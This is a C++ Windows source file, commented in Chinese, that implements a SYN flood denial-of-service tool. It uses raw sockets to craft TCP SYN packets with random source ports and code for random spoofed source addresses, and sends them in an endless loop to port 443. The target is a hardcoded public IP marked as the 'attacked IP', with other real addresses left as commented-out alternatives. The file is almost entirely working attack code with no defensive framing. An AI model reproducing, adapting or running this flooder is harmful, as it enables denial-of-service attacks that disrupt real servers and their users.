// 2.cpp : 定义控制台应用程序的入口点。 //
#include "stdafx.h" #include <winsock2.h> #include <stdio.h> #include <windows.h> #include <ws2tcpip.h> #include <stdlib.h> #pragma comment(lib,"ws2_32.lib")
#define SEQ 0x28376839//ip数据包结构 //#define SYN_DEST_IP "36.152.44.96"//被攻击的IP #define SYN_DEST_IP "112.25.57.102" //#define SYN_DEST_IP "192.168.145.131" //#define SYN_DEST_IP "202.101.244.16" //#define SYN_DEST_IP "192.168.43.50"
//#define SYN_SOUR_IP "172.20.10.7"//源ip地址 #pragma pack(push,1) typedef struct _iphdr //定义IP首部 { unsigned char h_verlen; //4位首部长度,4位IP版本号 unsigned char tos; //8位服务类型TOS unsigned short total_len; //16位总长度(字节) unsigned short ident; //16位标识 unsigned short frag_and_flags; //3位标志位 unsigned char ttl; //8位生存时间 TTL unsigned char proto; //8位协议 (TCP, UDP 或其他) unsigned short checksum; //16位IP首部校验和 unsigned int sourceIP; //32位源IP地址 unsigned int destIP; //32位目的IP地址 }IP_HEADER; struct //定义TCP伪首部 { unsigned long saddr; //源地址 unsigned long daddr; //目的地址 char mbz; //, 用于填充对齐 char ptcl; //协议类型 unsigned short tcpl; //TCP长度 }psd_header; typedef struct _tcphdr //定义TCP首部 { USHORT th_sport; //16位源端口 USHORT th_dport; //16位目的端口 unsigned int th_seq; //32位序列号 unsigned int th_ack; //32位确认号 unsigned char th_lenres; //4位首部长度/6位保留字 unsigned char th_flag; //6位标志位 USHORT th_win; //16位窗口大小 USHORT th_sum; //16位校验和 USHORT th_urp; //16位紧急数据偏移量 }TCP_HEADER; #pragma pack(pop) //CheckSum:计算校验和的子函数 USHORT checksum(USHORT *buffer, int size) { unsigned long cksum = 0; while (size >1) { cksum += *buffer++; size -= sizeof(USHORT); } if (size) { cksum += (UCHAR)buffer; } cksum = (cksum >> 16) + (cksum & 0xffff); cksum += (cksum >> 16); return (USHORT)(~cksum); } //生成随机ip void random_ip(char *str){ int a, b, c, d; a = rand() % 255; b = rand() % 255; c = rand() % 255; d = rand() % 255; sprintf(str, "%d.%d.%d.%d", a, b, c, d); }
// SynFlood主函数 int main() { int datasize, ErrorCode,iresult; int flag = 1, SendSEQ = 0; char SendBuf[500] = {0}; WSADATA wsaData;
struct sockaddr_in DestAddr;
IP_HEADER ip_header;
TCP_HEADER tcp_header;
//初始化SOCK_RAW
if ((ErrorCode = WSAStartup(MAKEWORD(2, 2), &wsaData)) != 0){
printf("初始化失败!\n");
}
int SockRaw = socket(AF_INET, SOCK_RAW, IPPROTO_IP);
if (SockRaw == INVALID_SOCKET){
printf("创建套接字失败! 错误码 :%d\n", WSAGetLastError());
}
flag = TRUE;
// 防止自动填充数据包
int opt = setsockopt(SockRaw, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag));
if (opt == SOCKET_ERROR){
printf("设置 IP_HDRINCL 错误 ! 错误码 :%d\n", WSAGetLastError());
}
memset(&DestAddr, 0, sizeof(DestAddr));
DestAddr.sin_family = AF_INET;
DestAddr.sin_port = htons(443);
DestAddr.sin_addr.S_un.S_addr = inet_addr(SYN_DEST_IP);
while (1) {
// 伪造ip源地址
char fake_ip[20];
random_ip(fake_ip);
int port;
port = rand() % 65535;
//填充IP首部
ip_header.h_verlen = (4 << 4 | sizeof(ip_header) / sizeof(unsigned long));
//高四位IP版本号,低四位首部长度
ip_header.tos = 0;
ip_header.total_len = htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER)); //16位总长度(字节)
ip_header.ident = 1; //16位标识
ip_header.frag_and_flags = 0; //3位标志位
ip_header.ttl = 128; //8位生存时间TTL
ip_header.proto = IPPROTO_TCP; //8位协议(TCP,UDP…)
ip_header.checksum = 0; //16位IP首部校验和
ip_header.sourceIP = inet_addr("172.20.10.7");// fake_ip); //伪造32位源IP地址
ip_header.destIP = inet_addr(SYN_DEST_IP); //32位目的IP地址
//填充TCP首部
tcp_header.th_sport = htons(port); //伪造源端口号
tcp_header.th_dport = htons(443); //目的端口号
tcp_header.th_seq = htonl(SEQ + SendSEQ); //SYN序列号
tcp_header.th_ack = 0; //ACK序列号置为0
tcp_header.th_lenres = (sizeof(TCP_HEADER) / 4 << 4 | 0); //TCP长度和保留位
tcp_header.th_flag = 2; //SYN 标志
tcp_header.th_win = htons(6384); //窗口大小
tcp_header.th_urp = 0; //偏移
tcp_header.th_sum = 0; //校验和
//填充TCP伪首部(用于计算校验和,并不真正发送)
psd_header.saddr = ip_header.sourceIP; //源地址
psd_header.daddr = ip_header.destIP; //目的地址
psd_header.mbz = 0;
psd_header.ptcl = IPPROTO_TCP; //协议类型
psd_header.tcpl = htons(sizeof(tcp_header)); //TCP首部长度
//计算IP校验和
memcpy(SendBuf, &psd_header, sizeof(psd_header));
memcpy(SendBuf + sizeof(psd_header), &tcp_header, sizeof(tcp_header));
tcp_header.th_sum = checksum((USHORT *)SendBuf, sizeof(psd_header)+sizeof(tcp_header));
memcpy(SendBuf, &ip_header, sizeof(ip_header));
memcpy(SendBuf + sizeof(ip_header), &tcp_header, sizeof(tcp_header));
datasize = sizeof(ip_header)+sizeof(tcp_header);
//发送TCP报文
iresult = sendto(SockRaw,
SendBuf,
datasize+20,
0,
(struct sockaddr*) &DestAddr,
sizeof(DestAddr));
if (iresult == SOCKET_ERROR)
{
printf("发送失败! 错误码 :%d\n", WSAGetLastError());
break;
}
else
printf("随机ip地址:%s\n", fake_ip);
printf("随机端口 :%d\n", port);
printf("缓冲区内容:%s\n", SendBuf);
}//End of While
closesocket(SockRaw);
WSACleanup();
return 0;
}